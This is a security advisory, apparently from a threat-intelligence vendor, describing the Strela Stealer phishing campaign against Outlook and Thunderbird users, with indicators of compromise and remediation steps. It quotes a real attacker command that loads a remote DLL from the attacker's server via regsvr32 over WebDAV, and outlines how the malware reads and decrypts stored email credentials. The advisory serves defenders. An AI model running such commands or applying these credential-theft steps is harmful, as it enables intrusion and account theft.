Request a Demo
Rewterz
EncryptHub: A Multi-Stage Malware Breach Impacting 600 Organizations – Active IOCs
March 11, 2025
Rewterz
SideWinder APT Targets Maritime, Nuclear, and IT Sectors Across Asia, the Middle East, and Africa – Active IOCs
March 11, 2025

Strela Stealer Malware Targets Microsoft Outlook Users for Credential Theft – Active IOCs

Severity

High

Analysis Summary

Cybersecurity researchers have uncovered a sophisticated malware campaign targeting Microsoft Outlook users to steal login credentials. Dubbed Strela Stealer, the malware—named after the Russian word for “Arrow”—has been active since late 2022, primarily affecting users in Spain, Italy, Germany, Poland, and Ukraine. It specifically exfiltrates email credentials from both Microsoft Outlook and Mozilla Thunderbird clients.

The malware is distributed through targeted phishing emails designed to appear legitimate. Attackers hijack existing email conversations, particularly invoice-related threads, and replace original attachments with malicious ZIP archives. These ZIP files contain a JScript loader, which initiates the infection chain once executed. The phishing emails are written in the native language of the target country, increasing their credibility.

Strela Stealer employs multi-stage infection and obfuscation techniques to evade detection. The initial infection starts with a heavily obfuscated JScript file, which verifies the target system’s geographic location by checking the system’s locale identifier (LCID) in the Windows registry (Control Panel\International\Locale). Once confirmed as a target, the script downloads additional payloads from a command-and-control (C2) server using the WebDAV protocol. The malware loads its second stage directly into memory via the command:

"cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL"

This fileless execution method prevents detection by traditional antivirus solutions.

The final payload focuses on stealing Microsoft Outlook credentials. It scans the Windows registry for Outlook profile data, particularly targeting the key:

"HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"

where email configurations are stored. The malware extracts IMAP Usernames, Servers, and Passwords, decrypting stored credentials using the CryptUnprotectData API. Before exfiltrating stolen data, it employs bit-checking routines to ensure activation only on targeted systems. The stolen credentials and system information are then transmitted via HTTP POST requests to an attacker-controlled server.

Strela Stealer highlights the growing sophistication of targeted phishing attacks and fileless malware techniques. Organizations must strengthen email security, implement geo-based filtering, disable macros in email attachments, and monitor WebDAV traffic to detect abnormal connections. Additionally, using multi-factor authentication (MFA) and endpoint detection solutions can significantly reduce the risk of credential theft.

Impact

  • Credential Theft
  • Data Theft
  • Command Execution

Indicators of Compromise

IP

  • 193.143.1.205

MD5

  • 5ffaa31b6bdb230103cad1d3a7e88982

  • a1da7ee6e62dd8a6226a13e22ee63f51

  • 003c31acbc417d777232960a502158c8

SHA-256

  • f5c54fce6c9e2f84b084bbf9968c9a76d9cd74a11ccf4fcba29dbe2e4574e3d7

  • 9c49266e315eb76ce73cbe542cfd2bbf28844689944ac8776daecbdcdecd8cf8

  • 31389cb2f067020f181462bab3519c22fd88da084012729e9edf79d15427b86f

SHA1

  • 4d2def6ee868c20a4aa74b658dae9794c1724a69

  • 4005b309336cda3a4f0c72655163176a23cdf8fd

  • b222e9a5361ce4aab6ac55272cb485feafe8e79c

URL

  • http://193.143.1.205/invoice.php
  • http://193.143.1.205/up.php

Remediation

  • Implement geo-based email filtering to block phishing emails targeting specific regions.
  • Train employees to recognize phishing attempts, especially invoice-related email scams.
  • Enforce multi-factor authentication (MFA) to prevent unauthorized email access.
  • Regularly update endpoint detection and response (EDR) solutions to detect fileless malware.
  • Disable macros and script execution for untrusted email attachments.
  • Monitor WebDAV traffic for unusual outbound connections to potential command-and-control servers.
  • Restrict execution of JScript and other scripting languages in corporate environments.
  • Conduct regular security audits to identify and patch vulnerabilities in email clients.
  • Use application whitelisting to prevent unauthorized script execution.
  • Deploy email security gateways to scan and filter malicious attachments before delivery.